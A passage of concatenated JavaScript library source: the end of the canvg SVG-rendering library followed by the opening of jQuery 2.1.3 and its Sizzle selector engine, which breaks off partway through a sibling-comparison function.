			function imSet(img, x, y, width, height, rgba, val) {
				img[y*width*4 + x*4 + rgba] = val;
			}

			function m(i, v) {
				var mi = matrix[i];
				return mi * (mi < 0 ? v - 255 : v);
			}

			this.apply = function(ctx, x, y, width, height) {
				// assuming x==0 && y==0 for now
				var srcData = ctx.getImageData(0, 0, width, height);
				for (var y = 0; y < height; y++) {
					for (var x = 0; x < width; x++) {
						var r = imGet(srcData.data, x, y, width, height, 0);
						var g = imGet(srcData.data, x, y, width, height, 1);
						var b = imGet(srcData.data, x, y, width, height, 2);
						var a = imGet(srcData.data, x, y, width, height, 3);
						imSet(srcData.data, x, y, width, height, 0, m(0,r)+m(1,g)+m(2,b)+m(3,a)+m(4,1));
						imSet(srcData.data, x, y, width, height, 1, m(5,r)+m(6,g)+m(7,b)+m(8,a)+m(9,1));
						imSet(srcData.data, x, y, width, height, 2, m(10,r)+m(11,g)+m(12,b)+m(13,a)+m(14,1));
						imSet(srcData.data, x, y, width, height, 3, m(15,r)+m(16,g)+m(17,b)+m(18,a)+m(19,1));
					}
				}
				ctx.clearRect(0, 0, width, height);
				ctx.putImageData(srcData, 0, 0);
			}
		}
		svg.Element.feColorMatrix.prototype = new svg.Element.ElementBase;

		svg.Element.feGaussianBlur = function(node) {
			this.base = svg.Element.ElementBase;
			this.base(node);

			this.blurRadius = Math.floor(this.attribute('stdDeviation').numValue());
			this.extraFilterDistance = this.blurRadius;

			this.apply = function(ctx, x, y, width, height) {
				if (typeof(stackBlur.canvasRGBA) == 'undefined') {
					svg.log('ERROR: StackBlur.js must be included for blur to work');
					return;
				}

				// StackBlur requires canvas be on document
				ctx.canvas.id = svg.UniqueId();
				ctx.canvas.style.display = 'none';
				document.body.appendChild(ctx.canvas);
				stackBlur.canvasRGBA(ctx.canvas.id, x, y, width, height, this.blurRadius);
				document.body.removeChild(ctx.canvas);
			}
		}
		svg.Element.feGaussianBlur.prototype = new svg.Element.ElementBase;

		// title element, do nothing
		svg.Element.title = function(node) {
		}
		svg.Element.title.prototype = new svg.Element.ElementBase;

		// desc element, do nothing
		svg.Element.desc = function(node) {
		}
		svg.Element.desc.prototype = new svg.Element.ElementBase;

		svg.Element.MISSING = function(node) {
			svg.log('ERROR: Element \'' + node.nodeName + '\' not yet implemented.');
		}
		svg.Element.MISSING.prototype = new svg.Element.ElementBase;

		// element factory
		svg.CreateElement = function(node) {
			var className = node.nodeName.replace(/^[^:]+:/,''); // remove namespace
			className = className.replace(/\-/g,''); // remove dashes
			var e = null;
			if (typeof(svg.Element[className]) != 'undefined') {
				e = new svg.Element[className](node);
			}
			else {
				e = new svg.Element.MISSING(node);
			}

			e.type = node.nodeName;
			return e;
		}

		// load from url
		svg.load = function(ctx, url) {
			svg.loadXml(ctx, svg.ajax(url));
		}

		// load from xml
		svg.loadXml = function(ctx, xml) {
			svg.loadXmlDoc(ctx, svg.parseXml(xml));
		}

		svg.loadXmlDoc = function(ctx, dom) {
			svg.init(ctx);

			var mapXY = function(p) {
				var e = ctx.canvas;
				while (e) {
					p.x -= e.offsetLeft;
					p.y -= e.offsetTop;
					e = e.offsetParent;
				}
				if (window.scrollX) p.x += window.scrollX;
				if (window.scrollY) p.y += window.scrollY;
				return p;
			}

			// bind mouse
			if (svg.opts['ignoreMouse'] != true) {
				ctx.canvas.onclick = function(e) {
					var p = mapXY(new svg.Point(e != null ? e.clientX : event.clientX, e != null ? e.clientY : event.clientY));
					svg.Mouse.onclick(p.x, p.y);
				};
				ctx.canvas.onmousemove = function(e) {
					var p = mapXY(new svg.Point(e != null ? e.clientX : event.clientX, e != null ? e.clientY : event.clientY));
					svg.Mouse.onmousemove(p.x, p.y);
				};
			}

			var e = svg.CreateElement(dom.documentElement);
			e.root = true;
			e.addStylesFromStyleDefinition();

			// render loop
			var isFirstRender = true;
			var draw = function() {
				svg.ViewPort.Clear();
				if (ctx.canvas.parentNode) svg.ViewPort.SetCurrent(ctx.canvas.parentNode.clientWidth, ctx.canvas.parentNode.clientHeight);

				if (svg.opts['ignoreDimensions'] != true) {
					// set canvas size
					if (e.style('width').hasValue()) {
						ctx.canvas.width = e.style('width').toPixels('x');
						ctx.canvas.style.width = ctx.canvas.width + 'px';
					}
					if (e.style('height').hasValue()) {
						ctx.canvas.height = e.style('height').toPixels('y');
						ctx.canvas.style.height = ctx.canvas.height + 'px';
					}
				}
				var cWidth = ctx.canvas.clientWidth || ctx.canvas.width;
				var cHeight = ctx.canvas.clientHeight || ctx.canvas.height;
				if (svg.opts['ignoreDimensions'] == true && e.style('width').hasValue() && e.style('height').hasValue()) {
					cWidth = e.style('width').toPixels('x');
					cHeight = e.style('height').toPixels('y');
				}
				svg.ViewPort.SetCurrent(cWidth, cHeight);

				if (svg.opts['offsetX'] != null) e.attribute('x', true).value = svg.opts['offsetX'];
				if (svg.opts['offsetY'] != null) e.attribute('y', true).value = svg.opts['offsetY'];
				if (svg.opts['scaleWidth'] != null || svg.opts['scaleHeight'] != null) {
					var xRatio = null, yRatio = null, viewBox = svg.ToNumberArray(e.attribute('viewBox').value);

					if (svg.opts['scaleWidth'] != null) {
						if (e.attribute('width').hasValue()) xRatio = e.attribute('width').toPixels('x') / svg.opts['scaleWidth'];
						else if (!isNaN(viewBox[2])) xRatio = viewBox[2] / svg.opts['scaleWidth'];
					}

					if (svg.opts['scaleHeight'] != null) {
						if (e.attribute('height').hasValue()) yRatio = e.attribute('height').toPixels('y') / svg.opts['scaleHeight'];
						else if (!isNaN(viewBox[3])) yRatio = viewBox[3] / svg.opts['scaleHeight'];
					}

					if (xRatio == null) { xRatio = yRatio; }
					if (yRatio == null) { yRatio = xRatio; }

					e.attribute('width', true).value = svg.opts['scaleWidth'];
					e.attribute('height', true).value = svg.opts['scaleHeight'];
					e.style('transform', true, true).value += ' scale('+(1.0/xRatio)+','+(1.0/yRatio)+')';
				}

				// clear and render
				if (svg.opts['ignoreClear'] != true) {
					ctx.clearRect(0, 0, cWidth, cHeight);
				}
				e.render(ctx);
				if (isFirstRender) {
					isFirstRender = false;
					if (typeof(svg.opts['renderCallback']) == 'function') svg.opts['renderCallback'](dom);
				}
			}

			var waitingForImages = true;
			if (svg.ImagesLoaded()) {
				waitingForImages = false;
				draw();
			}
			svg.intervalID = setInterval(function() {
				var needUpdate = false;

				if (waitingForImages && svg.ImagesLoaded()) {
					waitingForImages = false;
					needUpdate = true;
				}

				// need update from mouse events?
				if (svg.opts['ignoreMouse'] != true) {
					needUpdate = needUpdate | svg.Mouse.hasEvents();
				}

				// need update from animations?
				if (svg.opts['ignoreAnimation'] != true) {
					for (var i=0; i<svg.Animations.length; i++) {
						needUpdate = needUpdate | svg.Animations[i].update(1000 / svg.FRAMERATE);
					}
				}

				// need update from redraw?
				if (typeof(svg.opts['forceRedraw']) == 'function') {
					if (svg.opts['forceRedraw']() == true) needUpdate = true;
				}

				// render if needed
				if (needUpdate) {
					draw();
					svg.Mouse.runEvents(); // run and clear our events
				}
			}, 1000 / svg.FRAMERATE);
		}

		svg.stop = function() {
			if (svg.intervalID) {
				clearInterval(svg.intervalID);
			}
		}

		svg.Mouse = new (function() {
			this.events = [];
			this.hasEvents = function() { return this.events.length != 0; }

			this.onclick = function(x, y) {
				this.events.push({ type: 'onclick', x: x, y: y,
					run: function(e) { if (e.onclick) e.onclick(); }
				});
			}

			this.onmousemove = function(x, y) {
				this.events.push({ type: 'onmousemove', x: x, y: y,
					run: function(e) { if (e.onmousemove) e.onmousemove(); }
				});
			}

			this.eventElements = [];

			this.checkPath = function(element, ctx) {
				for (var i=0; i<this.events.length; i++) {
					var e = this.events[i];
					if (ctx.isPointInPath && ctx.isPointInPath(e.x, e.y)) this.eventElements[i] = element;
				}
			}

			this.checkBoundingBox = function(element, bb) {
				for (var i=0; i<this.events.length; i++) {
					var e = this.events[i];
					if (bb.isPointInBox(e.x, e.y)) this.eventElements[i] = element;
				}
			}

			this.runEvents = function() {
				svg.ctx.canvas.style.cursor = '';

				for (var i=0; i<this.events.length; i++) {
					var e = this.events[i];
					var element = this.eventElements[i];
					while (element) {
						e.run(element);
						element = element.parent;
					}
				}

				// done running, clear
				this.events = [];
				this.eventElements = [];
			}
		});

		return svg;
	};

	if (typeof(CanvasRenderingContext2D) != 'undefined') {
		CanvasRenderingContext2D.prototype.drawSvg = function(s, dx, dy, dw, dh) {
			canvg(this.canvas, s, {
				ignoreMouse: true,
				ignoreAnimation: true,
				ignoreDimensions: true,
				ignoreClear: true,
				offsetX: dx,
				offsetY: dy,
				scaleWidth: dw,
				scaleHeight: dh
			});
		}
	}

	return canvg;

}));


==> results/VENN-Diag/jquery-2.1.3.js <==
/*!
 * jQuery JavaScript Library v2.1.3
 * http://jquery.com/
 *
 * Includes Sizzle.js
 * http://sizzlejs.com/
 *
 * Copyright 2005, 2014 jQuery Foundation, Inc. and other contributors
 * Released under the MIT license
 * http://jquery.org/license
 *
 * Date: 2014-12-18T15:11Z
 */

(function( global, factory ) {

	if ( typeof module === "object" && typeof module.exports === "object" ) {
		// For CommonJS and CommonJS-like environments where a proper `window`
		// is present, execute the factory and get jQuery.
		// For environments that do not have a `window` with a `document`
		// (such as Node.js), expose a factory as module.exports.
		// This accentuates the need for the creation of a real `window`.
		// e.g. var jQuery = require("jquery")(window);
		// See ticket #14549 for more info.
		module.exports = global.document ?
			factory( global, true ) :
			function( w ) {
				if ( !w.document ) {
					throw new Error( "jQuery requires a window with a document" );
				}
				return factory( w );
			};
	} else {
		factory( global );
	}

// Pass this if window is not defined yet
}(typeof window !== "undefined" ? window : this, function( window, noGlobal ) {

// Support: Firefox 18+
// Can't be in strict mode, several libs including ASP.NET trace
// the stack via arguments.caller.callee and Firefox dies if
// you try to trace through "use strict" call chains. (#13335)
//

var arr = [];

var slice = arr.slice;

var concat = arr.concat;

var push = arr.push;

var indexOf = arr.indexOf;

var class2type = {};

var toString = class2type.toString;

var hasOwn = class2type.hasOwnProperty;

var support = {};



var
	// Use the correct document accordingly with window argument (sandbox)
	document = window.document,

	version = "2.1.3",

	// Define a local copy of jQuery
	jQuery = function( selector, context ) {
		// The jQuery object is actually just the init constructor 'enhanced'
		// Need init if jQuery is called (just allow error to be thrown if not included)
		return new jQuery.fn.init( selector, context );
	},

	// Support: Android<4.1
	// Make sure we trim BOM and NBSP
	rtrim = /^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,

	// Matches dashed string for camelizing
	rmsPrefix = /^-ms-/,
	rdashAlpha = /-([\da-z])/gi,

	// Used by jQuery.camelCase as callback to replace()
	fcamelCase = function( all, letter ) {
		return letter.toUpperCase();
	};

jQuery.fn = jQuery.prototype = {
	// The current version of jQuery being used
	jquery: version,

	constructor: jQuery,

	// Start with an empty selector
	selector: "",

	// The default length of a jQuery object is 0
	length: 0,

	toArray: function() {
		return slice.call( this );
	},

	// Get the Nth element in the matched element set OR
	// Get the whole matched element set as a clean array
	get: function( num ) {
		return num != null ?

			// Return just the one element from the set
			( num < 0 ? this[ num + this.length ] : this[ num ] ) :

			// Return all the elements in a clean array
			slice.call( this );
	},

	// Take an array of elements and push it onto the stack
	// (returning the new matched element set)
	pushStack: function( elems ) {

		// Build a new jQuery matched element set
		var ret = jQuery.merge( this.constructor(), elems );

		// Add the old object onto the stack (as a reference)
		ret.prevObject = this;
		ret.context = this.context;

		// Return the newly-formed element set
		return ret;
	},

	// Execute a callback for every element in the matched set.
	// (You can seed the arguments with an array of args, but this is
	// only used internally.)
	each: function( callback, args ) {
		return jQuery.each( this, callback, args );
	},

	map: function( callback ) {
		return this.pushStack( jQuery.map(this, function( elem, i ) {
			return callback.call( elem, i, elem );
		}));
	},

	slice: function() {
		return this.pushStack( slice.apply( this, arguments ) );
	},

	first: function() {
		return this.eq( 0 );
	},

	last: function() {
		return this.eq( -1 );
	},

	eq: function( i ) {
		var len = this.length,
			j = +i + ( i < 0 ? len : 0 );
		return this.pushStack( j >= 0 && j < len ? [ this[j] ] : [] );
	},

	end: function() {
		return this.prevObject || this.constructor(null);
	},

	// For internal use only.
	// Behaves like an Array's method, not like a jQuery method.
	push: push,
	sort: arr.sort,
	splice: arr.splice
};

jQuery.extend = jQuery.fn.extend = function() {
	var options, name, src, copy, copyIsArray, clone,
		target = arguments[0] || {},
		i = 1,
		length = arguments.length,
		deep = false;

	// Handle a deep copy situation
	if ( typeof target === "boolean" ) {
		deep = target;

		// Skip the boolean and the target
		target = arguments[ i ] || {};
		i++;
	}

	// Handle case when target is a string or something (possible in deep copy)
	if ( typeof target !== "object" && !jQuery.isFunction(target) ) {
		target = {};
	}

	// Extend jQuery itself if only one argument is passed
	if ( i === length ) {
		target = this;
		i--;
	}

	for ( ; i < length; i++ ) {
		// Only deal with non-null/undefined values
		if ( (options = arguments[ i ]) != null ) {
			// Extend the base object
			for ( name in options ) {
				src = target[ name ];
				copy = options[ name ];

				// Prevent never-ending loop
				if ( target === copy ) {
					continue;
				}

				// Recurse if we're merging plain objects or arrays
				if ( deep && copy && ( jQuery.isPlainObject(copy) || (copyIsArray = jQuery.isArray(copy)) ) ) {
					if ( copyIsArray ) {
						copyIsArray = false;
						clone = src && jQuery.isArray(src) ? src : [];

					} else {
						clone = src && jQuery.isPlainObject(src) ? src : {};
					}

					// Never move original objects, clone them
					target[ name ] = jQuery.extend( deep, clone, copy );

				// Don't bring in undefined values
				} else if ( copy !== undefined ) {
					target[ name ] = copy;
				}
			}
		}
	}

	// Return the modified object
	return target;
};

jQuery.extend({
	// Unique for each copy of jQuery on the page
	expando: "jQuery" + ( version + Math.random() ).replace( /\D/g, "" ),

	// Assume jQuery is ready without the ready module
	isReady: true,

	error: function( msg ) {
		throw new Error( msg );
	},

	noop: function() {},

	isFunction: function( obj ) {
		return jQuery.type(obj) === "function";
	},

	isArray: Array.isArray,

	isWindow: function( obj ) {
		return obj != null && obj === obj.window;
	},

	isNumeric: function( obj ) {
		// parseFloat NaNs numeric-cast false positives (null|true|false|"")
		// ...but misinterprets leading-number strings, particularly hex literals ("0x...")
		// subtraction forces infinities to NaN
		// adding 1 corrects loss of precision from parseFloat (#15100)
		return !jQuery.isArray( obj ) && (obj - parseFloat( obj ) + 1) >= 0;
	},

	isPlainObject: function( obj ) {
		// Not plain objects:
		// - Any object or value whose internal [[Class]] property is not "[object Object]"
		// - DOM nodes
		// - window
		if ( jQuery.type( obj ) !== "object" || obj.nodeType || jQuery.isWindow( obj ) ) {
			return false;
		}

		if ( obj.constructor &&
				!hasOwn.call( obj.constructor.prototype, "isPrototypeOf" ) ) {
			return false;
		}

		// If the function hasn't returned already, we're confident that
		// |obj| is a plain object, created by {} or constructed with new Object
		return true;
	},

	isEmptyObject: function( obj ) {
		var name;
		for ( name in obj ) {
			return false;
		}
		return true;
	},

	type: function( obj ) {
		if ( obj == null ) {
			return obj + "";
		}
		// Support: Android<4.0, iOS<6 (functionish RegExp)
		return typeof obj === "object" || typeof obj === "function" ?
			class2type[ toString.call(obj) ] || "object" :
			typeof obj;
	},

	// Evaluates a script in a global context
	globalEval: function( code ) {
		var script,
			indirect = eval;

		code = jQuery.trim( code );

		if ( code ) {
			// If the code includes a valid, prologue position
			// strict mode pragma, execute code by injecting a
			// script tag into the document.
			if ( code.indexOf("use strict") === 1 ) {
				script = document.createElement("script");
				script.text = code;
				document.head.appendChild( script ).parentNode.removeChild( script );
			} else {
			// Otherwise, avoid the DOM node creation, insertion
			// and removal by using an indirect global eval
				indirect( code );
			}
		}
	},

	// Convert dashed to camelCase; used by the css and data modules
	// Support: IE9-11+
	// Microsoft forgot to hump their vendor prefix (#9572)
	camelCase: function( string ) {
		return string.replace( rmsPrefix, "ms-" ).replace( rdashAlpha, fcamelCase );
	},

	nodeName: function( elem, name ) {
		return elem.nodeName && elem.nodeName.toLowerCase() === name.toLowerCase();
	},

	// args is for internal usage only
	each: function( obj, callback, args ) {
		var value,
			i = 0,
			length = obj.length,
			isArray = isArraylike( obj );

		if ( args ) {
			if ( isArray ) {
				for ( ; i < length; i++ ) {
					value = callback.apply( obj[ i ], args );

					if ( value === false ) {
						break;
					}
				}
			} else {
				for ( i in obj ) {
					value = callback.apply( obj[ i ], args );

					if ( value === false ) {
						break;
					}
				}
			}

		// A special, fast, case for the most common use of each
		} else {
			if ( isArray ) {
				for ( ; i < length; i++ ) {
					value = callback.call( obj[ i ], i, obj[ i ] );

					if ( value === false ) {
						break;
					}
				}
			} else {
				for ( i in obj ) {
					value = callback.call( obj[ i ], i, obj[ i ] );

					if ( value === false ) {
						break;
					}
				}
			}
		}

		return obj;
	},

	// Support: Android<4.1
	trim: function( text ) {
		return text == null ?
			"" :
			( text + "" ).replace( rtrim, "" );
	},

	// results is for internal usage only
	makeArray: function( arr, results ) {
		var ret = results || [];

		if ( arr != null ) {
			if ( isArraylike( Object(arr) ) ) {
				jQuery.merge( ret,
					typeof arr === "string" ?
					[ arr ] : arr
				);
			} else {
				push.call( ret, arr );
			}
		}

		return ret;
	},

	inArray: function( elem, arr, i ) {
		return arr == null ? -1 : indexOf.call( arr, elem, i );
	},

	merge: function( first, second ) {
		var len = +second.length,
			j = 0,
			i = first.length;

		for ( ; j < len; j++ ) {
			first[ i++ ] = second[ j ];
		}

		first.length = i;

		return first;
	},

	grep: function( elems, callback, invert ) {
		var callbackInverse,
			matches = [],
			i = 0,
			length = elems.length,
			callbackExpect = !invert;

		// Go through the array, only saving the items
		// that pass the validator function
		for ( ; i < length; i++ ) {
			callbackInverse = !callback( elems[ i ], i );
			if ( callbackInverse !== callbackExpect ) {
				matches.push( elems[ i ] );
			}
		}

		return matches;
	},

	// arg is for internal usage only
	map: function( elems, callback, arg ) {
		var value,
			i = 0,
			length = elems.length,
			isArray = isArraylike( elems ),
			ret = [];

		// Go through the array, translating each of the items to their new values
		if ( isArray ) {
			for ( ; i < length; i++ ) {
				value = callback( elems[ i ], i, arg );

				if ( value != null ) {
					ret.push( value );
				}
			}

		// Go through every key on the object,
		} else {
			for ( i in elems ) {
				value = callback( elems[ i ], i, arg );

				if ( value != null ) {
					ret.push( value );
				}
			}
		}

		// Flatten any nested arrays
		return concat.apply( [], ret );
	},

	// A global GUID counter for objects
	guid: 1,

	// Bind a function to a context, optionally partially applying any
	// arguments.
	proxy: function( fn, context ) {
		var tmp, args, proxy;

		if ( typeof context === "string" ) {
			tmp = fn[ context ];
			context = fn;
			fn = tmp;
		}

		// Quick check to determine if target is callable, in the spec
		// this throws a TypeError, but we will just return undefined.
		if ( !jQuery.isFunction( fn ) ) {
			return undefined;
		}

		// Simulated bind
		args = slice.call( arguments, 2 );
		proxy = function() {
			return fn.apply( context || this, args.concat( slice.call( arguments ) ) );
		};

		// Set the guid of unique handler to the same of original handler, so it can be removed
		proxy.guid = fn.guid = fn.guid || jQuery.guid++;

		return proxy;
	},

	now: Date.now,

	// jQuery.support is not used in Core but other projects attach their
	// properties to it so it needs to exist.
	support: support
});

// Populate the class2type map
jQuery.each("Boolean Number String Function Array Date RegExp Object Error".split(" "), function(i, name) {
	class2type[ "[object " + name + "]" ] = name.toLowerCase();
});

function isArraylike( obj ) {
	var length = obj.length,
		type = jQuery.type( obj );

	if ( type === "function" || jQuery.isWindow( obj ) ) {
		return false;
	}

	if ( obj.nodeType === 1 && length ) {
		return true;
	}

	return type === "array" || length === 0 ||
		typeof length === "number" && length > 0 && ( length - 1 ) in obj;
}
var Sizzle =
/*!
 * Sizzle CSS Selector Engine v2.2.0-pre
 * http://sizzlejs.com/
 *
 * Copyright 2008, 2014 jQuery Foundation, Inc. and other contributors
 * Released under the MIT license
 * http://jquery.org/license
 *
 * Date: 2014-12-16
 */
(function( window ) {

var i,
	support,
	Expr,
	getText,
	isXML,
	tokenize,
	compile,
	select,
	outermostContext,
	sortInput,
	hasDuplicate,

	// Local document vars
	setDocument,
	document,
	docElem,
	documentIsHTML,
	rbuggyQSA,
	rbuggyMatches,
	matches,
	contains,

	// Instance-specific data
	expando = "sizzle" + 1 * new Date(),
	preferredDoc = window.document,
	dirruns = 0,
	done = 0,
	classCache = createCache(),
	tokenCache = createCache(),
	compilerCache = createCache(),
	sortOrder = function( a, b ) {
		if ( a === b ) {
			hasDuplicate = true;
		}
		return 0;
	},

	// General-purpose constants
	MAX_NEGATIVE = 1 << 31,

	// Instance methods
	hasOwn = ({}).hasOwnProperty,
	arr = [],
	pop = arr.pop,
	push_native = arr.push,
	push = arr.push,
	slice = arr.slice,
	// Use a stripped-down indexOf as it's faster than native
	// http://jsperf.com/thor-indexof-vs-for/5
	indexOf = function( list, elem ) {
		var i = 0,
			len = list.length;
		for ( ; i < len; i++ ) {
			if ( list[i] === elem ) {
				return i;
			}
		}
		return -1;
	},

	booleans = "checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",

	// Regular expressions

	// Whitespace characters http://www.w3.org/TR/css3-selectors/#whitespace
	whitespace = "[\\x20\\t\\r\\n\\f]",
	// http://www.w3.org/TR/css3-syntax/#characters
	characterEncoding = "(?:\\\\.|[\\w-]|[^\\x00-\\xa0])+",

	// Loosely modeled on CSS identifier characters
	// An unquoted value should be a CSS identifier http://www.w3.org/TR/css3-selectors/#attribute-selectors
	// Proper syntax: http://www.w3.org/TR/CSS21/syndata.html#value-def-identifier
	identifier = characterEncoding.replace( "w", "w#" ),

	// Attribute selectors: http://www.w3.org/TR/selectors/#attribute-selectors
	attributes = "\\[" + whitespace + "*(" + characterEncoding + ")(?:" + whitespace +
		// Operator (capture 2)
		"*([*^$|!~]?=)" + whitespace +
		// "Attribute values must be CSS identifiers [capture 5] or strings [capture 3 or capture 4]"
		"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|(" + identifier + "))|)" + whitespace +
		"*\\]",

	pseudos = ":(" + characterEncoding + ")(?:\\((" +
		// To reduce the number of selectors needing tokenize in the preFilter, prefer arguments:
		// 1. quoted (capture 3; capture 4 or capture 5)
		"('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|" +
		// 2. simple (capture 6)
		"((?:\\\\.|[^\\\\()[\\]]|" + attributes + ")*)|" +
		// 3. anything else (capture 2)
		".*" +
		")\\)|)",

	// Leading and non-escaped trailing whitespace, capturing some non-whitespace characters preceding the latter
	rwhitespace = new RegExp( whitespace + "+", "g" ),
	rtrim = new RegExp( "^" + whitespace + "+|((?:^|[^\\\\])(?:\\\\.)*)" + whitespace + "+$", "g" ),

	rcomma = new RegExp( "^" + whitespace + "*," + whitespace + "*" ),
	rcombinators = new RegExp( "^" + whitespace + "*([>+~]|" + whitespace + ")" + whitespace + "*" ),

	rattributeQuotes = new RegExp( "=" + whitespace + "*([^\\]'\"]*?)" + whitespace + "*\\]", "g" ),

	rpseudo = new RegExp( pseudos ),
	ridentifier = new RegExp( "^" + identifier + "$" ),

	matchExpr = {
		"ID": new RegExp( "^#(" + characterEncoding + ")" ),
		"CLASS": new RegExp( "^\\.(" + characterEncoding + ")" ),
		"TAG": new RegExp( "^(" + characterEncoding.replace( "w", "w*" ) + ")" ),
		"ATTR": new RegExp( "^" + attributes ),
		"PSEUDO": new RegExp( "^" + pseudos ),
		"CHILD": new RegExp( "^:(only|first|last|nth|nth-last)-(child|of-type)(?:\\(" + whitespace +
			"*(even|odd|(([+-]|)(\\d*)n|)" + whitespace + "*(?:([+-]|)" + whitespace +
			"*(\\d+)|))" + whitespace + "*\\)|)", "i" ),
		"bool": new RegExp( "^(?:" + booleans + ")$", "i" ),
		// For use in libraries implementing .is()
		// We use this for POS matching in `select`
		"needsContext": new RegExp( "^" + whitespace + "*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\(" +
			whitespace + "*((?:-\\d)?\\d*)" + whitespace + "*\\)|)(?=[^-]|$)", "i" )
	},

	rinputs = /^(?:input|select|textarea|button)$/i,
	rheader = /^h\d$/i,

	rnative = /^[^{]+\{\s*\[native \w/,

	// Easily-parseable/retrievable ID or TAG or CLASS selectors
	rquickExpr = /^(?:#([\w-]+)|(\w+)|\.([\w-]+))$/,

	rsibling = /[+~]/,
	rescape = /'|\\/g,

	// CSS escapes http://www.w3.org/TR/CSS21/syndata.html#escaped-characters
	runescape = new RegExp( "\\\\([\\da-f]{1,6}" + whitespace + "?|(" + whitespace + ")|.)", "ig" ),
	funescape = function( _, escaped, escapedWhitespace ) {
		var high = "0x" + escaped - 0x10000;
		// NaN means non-codepoint
		// Support: Firefox<24
		// Workaround erroneous numeric interpretation of +"0x"
		return high !== high || escapedWhitespace ?
			escaped :
			high < 0 ?
				// BMP codepoint
				String.fromCharCode( high + 0x10000 ) :
				// Supplemental Plane codepoint (surrogate pair)
				String.fromCharCode( high >> 10 | 0xD800, high & 0x3FF | 0xDC00 );
	},

	// Used for iframes
	// See setDocument()
	// Removing the function wrapper causes a "Permission Denied"
	// error in IE
	unloadHandler = function() {
		setDocument();
	};

// Optimize for push.apply( _, NodeList )
try {
	push.apply(
		(arr = slice.call( preferredDoc.childNodes )),
		preferredDoc.childNodes
	);
	// Support: Android<4.0
	// Detect silently failing push.apply
	arr[ preferredDoc.childNodes.length ].nodeType;
} catch ( e ) {
	push = { apply: arr.length ?

		// Leverage slice if possible
		function( target, els ) {
			push_native.apply( target, slice.call(els) );
		} :

		// Support: IE<9
		// Otherwise append directly
		function( target, els ) {
			var j = target.length,
				i = 0;
			// Can't trust NodeList.length
			while ( (target[j++] = els[i++]) ) {}
			target.length = j - 1;
		}
	};
}

function Sizzle( selector, context, results, seed ) {
	var match, elem, m, nodeType,
		// QSA vars
		i, groups, old, nid, newContext, newSelector;

	if ( ( context ? context.ownerDocument || context : preferredDoc ) !== document ) {
		setDocument( context );
	}

	context = context || document;
	results = results || [];
	nodeType = context.nodeType;

	if ( typeof selector !== "string" || !selector ||
		nodeType !== 1 && nodeType !== 9 && nodeType !== 11 ) {

		return results;
	}

	if ( !seed && documentIsHTML ) {

		// Try to shortcut find operations when possible (e.g., not under DocumentFragment)
		if ( nodeType !== 11 && (match = rquickExpr.exec( selector )) ) {
			// Speed-up: Sizzle("#ID")
			if ( (m = match[1]) ) {
				if ( nodeType === 9 ) {
					elem = context.getElementById( m );
					// Check parentNode to catch when Blackberry 4.6 returns
					// nodes that are no longer in the document (jQuery #6963)
					if ( elem && elem.parentNode ) {
						// Handle the case where IE, Opera, and Webkit return items
						// by name instead of ID
						if ( elem.id === m ) {
							results.push( elem );
							return results;
						}
					} else {
						return results;
					}
				} else {
					// Context is not a document
					if ( context.ownerDocument && (elem = context.ownerDocument.getElementById( m )) &&
						contains( context, elem ) && elem.id === m ) {
						results.push( elem );
						return results;
					}
				}

			// Speed-up: Sizzle("TAG")
			} else if ( match[2] ) {
				push.apply( results, context.getElementsByTagName( selector ) );
				return results;

			// Speed-up: Sizzle(".CLASS")
			} else if ( (m = match[3]) && support.getElementsByClassName ) {
				push.apply( results, context.getElementsByClassName( m ) );
				return results;
			}
		}

		// QSA path
		if ( support.qsa && (!rbuggyQSA || !rbuggyQSA.test( selector )) ) {
			nid = old = expando;
			newContext = context;
			newSelector = nodeType !== 1 && selector;

			// qSA works strangely on Element-rooted queries
			// We can work around this by specifying an extra ID on the root
			// and working up from there (Thanks to Andrew Dupont for the technique)
			// IE 8 doesn't work on object elements
			if ( nodeType === 1 && context.nodeName.toLowerCase() !== "object" ) {
				groups = tokenize( selector );

				if ( (old = context.getAttribute("id")) ) {
					nid = old.replace( rescape, "\\$&" );
				} else {
					context.setAttribute( "id", nid );
				}
				nid = "[id='" + nid + "'] ";

				i = groups.length;
				while ( i-- ) {
					groups[i] = nid + toSelector( groups[i] );
				}
				newContext = rsibling.test( selector ) && testContext( context.parentNode ) || context;
				newSelector = groups.join(",");
			}

			if ( newSelector ) {
				try {
					push.apply( results,
						newContext.querySelectorAll( newSelector )
					);
					return results;
				} catch(qsaError) {
				} finally {
					if ( !old ) {
						context.removeAttribute("id");
					}
				}
			}
		}
	}

	// All others
	return select( selector.replace( rtrim, "$1" ), context, results, seed );
}

/**
 * Create key-value caches of limited size
 * @returns {Function(string, Object)} Returns the Object data after storing it on itself with
 *	property name the (space-suffixed) string and (if the cache is larger than Expr.cacheLength)
 *	deleting the oldest entry
 */
function createCache() {
	var keys = [];

	function cache( key, value ) {
		// Use (key + " ") to avoid collision with native prototype properties (see Issue #157)
		if ( keys.push( key + " " ) > Expr.cacheLength ) {
			// Only keep the most recent entries
			delete cache[ keys.shift() ];
		}
		return (cache[ key + " " ] = value);
	}
	return cache;
}

/**
 * Mark a function for special use by Sizzle
 * @param {Function} fn The function to mark
 */
function markFunction( fn ) {
	fn[ expando ] = true;
	return fn;
}

/**
 * Support testing using an element
 * @param {Function} fn Passed the created div and expects a boolean result
 */
function assert( fn ) {
	var div = document.createElement("div");

	try {
		return !!fn( div );
	} catch (e) {
		return false;
	} finally {
		// Remove from its parent by default
		if ( div.parentNode ) {
			div.parentNode.removeChild( div );
		}
		// release memory in IE
		div = null;
	}
}

/**
 * Adds the same handler for all of the specified attrs
 * @param {String} attrs Pipe-separated list of attributes
 * @param {Function} handler The method that will be applied
 */
function addHandle( attrs, handler ) {
	var arr = attrs.split("|"),
		i = attrs.length;

	while ( i-- ) {
		Expr.attrHandle[ arr[i] ] = handler;
	}
}

/**
 * Checks document order of two siblings
 * @param {Element} a
 * @param {Element} b
 * @returns {Number} Returns less than 0 if a precedes b, greater than 0 if a follows b
 */
function siblingCheck( a, b ) {
	var cur = b && a,
		diff = cur && a.nodeType === 1 && b.nodeType === 1 &&
			( ~b.sourceIndex || MAX_NEGATIVE ) -
			( ~a.sourceIndex || MAX_NEGATIVE );

	// Use IE sourceIndex if available on both nodes
	if ( diff ) {
		return diff;
	}

	// Check if b follows a
	if ( cur ) {
